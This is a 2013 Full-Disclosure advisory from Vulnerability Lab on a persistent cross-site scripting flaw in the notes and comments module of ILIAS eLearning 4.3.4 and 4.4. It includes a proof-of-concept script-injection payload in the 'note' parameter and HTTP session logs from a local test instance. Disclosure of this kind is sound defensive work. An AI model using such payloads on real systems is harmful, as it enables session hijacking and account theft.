[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-10-28 13:10:01
Message-ID: 526E6229.7090505 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1122
Release Date:
=============
2013-10-27
Vulnerability Laboratory ID (VL-ID):
====================================
1122
Common Vulnerability Scoring System:
====================================
3.9
Product & Service Introduction:
===============================
ILIAS is a web base learning management system (LMS, VLE). Features: Courses, SCORM 1.2 and \
2004, mail, forum, chat, groups, podcast, file sharing, authoring, CMS, test, wiki, personal \
desktop, LOM, LDAP, role based access.
(Copy of the Homepage: http://sourceforge.net/projects/ilias/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the ILIAS \
eLearning v4.3.4 & v4.4 CMS web-application.
Vulnerability Disclosure Timeline:
==================================
2013-10-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
ILIAS
Product: ILIAS eLearning - Content Management System 4.3.4 & 4.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability is detected in the ILIAS eLearning v4.3.4 & \
v4.4 CMS web-application. The bug allows an attacker (remote) to implement/inject malicious own \
malicious persistent script codes (application side).
The persistent web vulnerability is located in the `Notes & Comments` module. Remote attackers \
are able to inject own malicious script code via POST method request in the vulnerable comment \
or note parameters. The execute occurs in the in the comments and private notes modules of the \
admin panel.
Exploitation of the persistent web vulnerability requires low user interaction and a low \
privileged web-application user account. Successful exploitation of the vulnerability can lead \
to persistent session hijacking (customers), account steal via persistent web attacks, \
persistent phishing or persistent module context manipulation.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Notes
[+] Comments
Vulnerable Parameter(s):
[+] note
Affected Module(s):
[+] Private Notes
[+] Comments Review
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low \
user interaction and low privileged web-application user account. For demonstration or to \
reproduce ...
PoC: Public Comments & private Notes
<div class="ilNote">
<a name="note_35"><!-- <img src="./templates/default/images/note_unlabeled.png" alt="Note"
title="Note" border="0" style="vertical-align:text-bottom; margin-bottom:2px;"/> --></a>
<span class="small light"> Last edited on 26. Oct 2013</span>
<div class="ilNoteText"><h4 class="ilNoteTitle"></h4>><%20%20"<[PERSISTENT INJECTED SCRIPT \
CODE!]"> </div></div>
--- PoC Session Logs ---
Status: 302[Found]
POST http://ilias.localhost:8080/ilias.php?
note_type=1&cmd=post&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI&fallbackCmd=getNotesHTML&rtoken=2d302c4c574f61fc880f393433703e1b \
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[20]
Mime Type[text/html]
Request Headers:
Host[ilias.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://ilias.localhost:8080/ilias.php?note_type=1¬e_id=35&cmd=editNoteForm&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI]
Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie; \
authchallenge=459071aa3327de70506cb2a465507bf5] Connection[keep-alive]
Post Data:
note[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvulnerability-lab.com%2F%3E%40gmail.com%0D%0A%3E
%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cdiv+style%3D%221%40gmail.com%0D%0A%3E%22%3Cscript%3Ealert%28
document.cookie%29%3C%2Fscript%3E%40gmail.com]
cmd%5BupdateNote%5D[Update+Note]
note_id[35]
Response Headers:
Date[Sat, 26 Oct 2013 21:12:44 GMT]
Server[Apache/2.2.22 (Ubuntu)]
X-Powered-By[PHP/5.3.10-1ubuntu3.8]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[http://ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Content-Type[text/html]
Status: 200[OK]
GET http://ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top \
Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ]
Content Size[4997]
Mime Type[text/html]
Request Headers:
Host[ilias.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://ilias.localhost:8080/ilias.php?note_type=1¬e_id=35&cmd=editNoteForm&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI]
Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie; \
authchallenge=459071aa3327de70506cb2a465507bf5] Connection[keep-alive]
Response Headers:
Date[Sat, 26 Oct 2013 21:12:44 GMT]
Server[Apache/2.2.22 (Ubuntu)]
X-Powered-By[PHP/5.3.10-1ubuntu3.8]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
P3P[CP="CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT STA PRE"]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[4997]
Keep-Alive[timeout=5, max=99]
Connection[Keep-Alive]
Content-Type[text/html; charset=UTF-8]
Reference(s):
ilias.localhost:8080/ilias.php?baseClass=ilPersonalDesktopGUI&cmd=jumpToSelectedItems
ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top
ilias.localhost:8080/ilias.php?note_type=1&cmd=post&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI&fallbackCmd=getNotesHTML&rtoken=x
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the note input field.
Recognize also the affected output section were the vulnerable value executes.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability is estimated as \
medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to \
get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic